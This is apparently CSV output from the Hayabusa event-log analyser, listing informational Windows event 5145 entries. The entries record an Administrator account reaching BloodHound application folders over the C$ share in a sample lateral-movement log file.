2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
